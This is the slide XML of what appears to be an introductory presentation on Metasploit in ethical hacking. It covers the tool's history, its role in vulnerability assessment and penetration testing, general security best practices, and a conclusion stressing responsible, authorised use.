            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3809278953"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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5AAAB-44D6-EEBD-13DF-3469B8F3AB84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="954377" y="-191973"/>
            <a:ext cx="9905998" cy="5689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58CAE7A-1C02-28EE-3832-BAFF54F3DF35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="654627" y="342900"/>
            <a:ext cx="10806545" cy="6047509"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Vulnerability Management:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Conduct regular vulnerability assessments and penetration tests to identify weaknesses in your systems. Address any identified vulnerabilities promptly to minimize the risk of exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Incident Response Planning:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Develop and regularly test an incident response plan to efficiently detect, respond to, and recover from security incidents. This allows for a swift and coordinated response, reducing the potential impact of an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Security Monitoring and Logging:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Implement robust monitoring systems that collect and analyze logs from various devices and applications. This helps detect and respond to potential threats, including any suspicious activities that might indicate an attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Security Audits and Assessments:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Engage third-party security professionals to conduct periodic security audits and assessments. Their expertise can identify potential vulnerabilities and provide recommendations to enhance your security posture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399754197"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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1823-658D-B6F1-7959-55A7D57B4EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="746559" y="0"/>
            <a:ext cx="9905998" cy="1257299"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D779C0DA-C5C6-487F-18FC-2465815A48A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="633846" y="1257299"/>
            <a:ext cx="10952018" cy="5133109"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit is a powerful tool in the realm of ethical hacking, enabling security professionals to identify vulnerabilities, conduct penetration testing, and enhance overall cybersecurity. Responsible and ethical usage is paramount, with adherence to legal frameworks and permissions. By implementing best practices, organizations can proactively defend against cyber threats, minimizing the risk of successful attacks. The collaborative nature of Metasploit's community fosters knowledge sharing and collective efforts to strengthen defenses. When used responsibly, Metasploit can be an invaluable asset in fortifying digital security.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70041613"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:comb/>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5D0D3D8-50C8-A0F8-D48D-7E18DFCBC496}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1548245" y="618518"/>
            <a:ext cx="8717973" cy="5657591"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="173844837"/>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9A90-8A80-57B6-8778-D630926DA68B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452762" y="452760"/>
            <a:ext cx="10215238" cy="745725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{660BAA3E-8356-86BD-3375-677DC649D829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="186432" y="1562468"/>
            <a:ext cx="10481568" cy="5228949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>What is Metasploit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Role of Metasploit in Ethical Hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Components of Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit Workflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Use Cases and Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>best cyber security practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2800" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2312148460"/>
      </p:ext>
    </p:ext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5A086-4285-D7B9-F12C-BF0E11B2C0DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>What is Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0308CEF-C420-E94D-3ED2-BED5DC0DBF86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1988598"/>
            <a:ext cx="9905999" cy="3968319"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit was founded by HD Moore in 2003 as an open-source project with the objective of providing a standardized framework for penetration testing and vulnerability assessments. HD Moore initially developed Metasploit to help simplify the process of exploiting vulnerabilities and to enable security professionals to better understand and defend against potential threats.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>It  is an open-source penetration testing framework that helps security professionals identify vulnerabilities and assess the security of computer systems, networks, and applications. It provides a comprehensive set of tools, exploits, and payloads to simulate real-world attacks and test the effectiveness of security measures.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4258303023"/>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1547-3D49-685F-4173-1FF3C999E0F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180730" y="106532"/>
            <a:ext cx="9487270" cy="2183907"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Role of Metasploit in Ethical Hacking</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2450B8BA-23BB-9591-339B-097DCD935582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1278384" y="1802167"/>
            <a:ext cx="9389615" cy="4545367"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Vulnerability Identification AND ASSESSMENT:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit helps ethical hackers identify and assess vulnerabilities in computer systems, networks, and applications. It provides a vast collection of exploit modules that can be used to test and exploit known vulnerabilities. By using Metasploit, ethical hackers can proactively identify weak points in a target system and assess the potential impact of these vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Exploitation and Penetration Testing:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit enables ethical hackers to simulate real-world attacks by utilizing various exploit modules and payloads. It allows them to launch targeted attacks on systems and applications to determine their level of security. By exploiting vulnerabilities, ethical hackers can gain unauthorized access, escalate privileges, and demonstrate the potential impact of successful attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2807967713"/>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3E9C54-7DFE-D3E9-C86E-1C0DC9F218BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1305017" y="523783"/>
            <a:ext cx="9742394" cy="5433134"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Post-Exploitation Activities:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>After successful exploitation, Metasploit assists ethical hackers in performing post-exploitation activities. This includes maintaining access to compromised systems, executing further actions, and pivoting through the network to explore additional targets. Ethical hackers can leverage Metasploit's post-exploitation modules to extract sensitive data, manipulate configurations, or perform other actions to assess the overall security posture of the target environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Security Testing and Validation:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit allows ethical hackers to validate the effectiveness of security controls and countermeasures implemented by organizations. By attempting to exploit vulnerabilities and gain unauthorized access, ethical hackers can identify weaknesses in the system's defenses. This helps organizations understand their security gaps and take proactive measures to improve their security infrastructure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="0" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Söhne"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1233274713"/>
      </p:ext>
    </p:extLst>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50F18F-773B-7A11-B89B-BB33BBCCE6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="674688"/>
            <a:ext cx="9906000" cy="5116512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Research and Development:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Metasploit serves as a platform for security researchers to develop and test new exploits, payloads, and modules. Ethical hackers can contribute to the community by sharing their findings, developing new techniques, and collaborating on improving the framework. Metasploit's open-source nature fosters innovation and knowledge sharing within the ethical hacking community.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1947498800"/>
      </p:ext>
    </p:extLst>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85A5-E0B1-683C-6628-FCB5E27E3C41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="621437"/>
            <a:ext cx="9905998" cy="1129422"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="3600" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Söhne"/>
              </a:rPr>
              <a:t>Components of Metasploit</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="3600" b="1"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C1C9A50E-82FF-FB5B-BF1C-FD16B1AC72E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
